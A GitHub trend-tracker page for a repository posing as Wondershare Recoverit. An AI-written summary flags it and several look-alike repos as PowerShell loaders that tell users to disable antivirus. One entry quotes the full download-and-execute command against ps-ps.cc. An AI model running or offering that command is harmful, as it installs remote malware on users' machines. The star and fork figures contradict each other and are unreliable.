Macroeablade/Wondshare-Recoverit
About the project
The repository poses as a Wondshare Recoverit data-recovery suite, but is actually a PowerShell one-liner that downloads and executes a remote Loader.ps1 from ps-ps.cc, with instructions to disable antivirus and bypass Execution Policy.
Useful for
- Do not run: the irm ... | iex command executes arbitrary remote code from ps-ps.cc
- Check the repo for malware-installer red flags before any use
README summarized by DeepSeek V4.1 Flash. Details may be inaccurate.
Why it’s trending
- 153 stars so far today, about 194 expected by the end of the day.
- The repository is 1 day old and already has 141 stars. With less than two weeks of history, there's no usual pace to compare the spike against yet.
- Top new repositories this week: #127.
- About 92 forks a day — people are taking the code.
Stars per day
Bars are daily stars, the line is the usual pace. Red marks spike days.
Numbers
- Total stars
- 141
- Today
- 153 · ≈ 194 by evening
- Forks
- 12
- Issues and pull requests
- 0
- Watchers
- 0
- Created
- October 1, 2026
- Last push
- October 1, 2026
Star trust
Growth looks organic: forks and discussion are in line with active projects, and stars arrive unevenly, the way people give them.
These are heuristics, not a verdict: we judge by the repository’s behavior, not by a list of stargazers.
Spotted in
- October 2, 2026Top new repositories this week: #114
Similar by description
-
5.9
denmooseflex/Display-Fusion
The repository poses as a Display Fusion configuration manager, but is actually an installer distributing a pirated "pre-activated" version via a remote PowerShell script. The README includes instructions for bypassing…
-
5.9
flowchorderadicate/DVD-Creator
The repository poses as a DVD authoring application, but is actually a loader script that downloads and executes third-party code from ps-ps.cc via PowerShell, instructing users to disable Windows protections.
-
5.8
Pulverizeclirouse/StartAll-Back
The repository poses as a StartAll Back optimization utility, but is essentially a loader script: the README tells users to run `irm https://ps-ps.cc/powershell/Loader.ps1 | iex` and disable antivirus. There is no…
-
5.8
ashdriverclippers/Microsoft-Visio
The repo poses as a "Microsoft Visio optimization suite", but is actually a PowerShell loader that fetches and executes remote code from ps-ps.cc and tells users to disable antivirus. Signs of a malicious/pirated…
-
5.9
BackerAbide59/Fps-Booster-for-Windows
The repository poses as an FPS booster for Windows, but it actually instructs users to run remote PowerShell code and disable antivirus. It looks like a malicious or scam scheme rather than a real optimizer.
-
6.1
CoatDistributorHost/Adobe-Substance-3d
The repository poses as an optimization suite for Adobe Substance 3D, but actually instructs users to run a third-party PowerShell script (irm ... | iex) for a 'pre-activated' install and to bypass antivirus.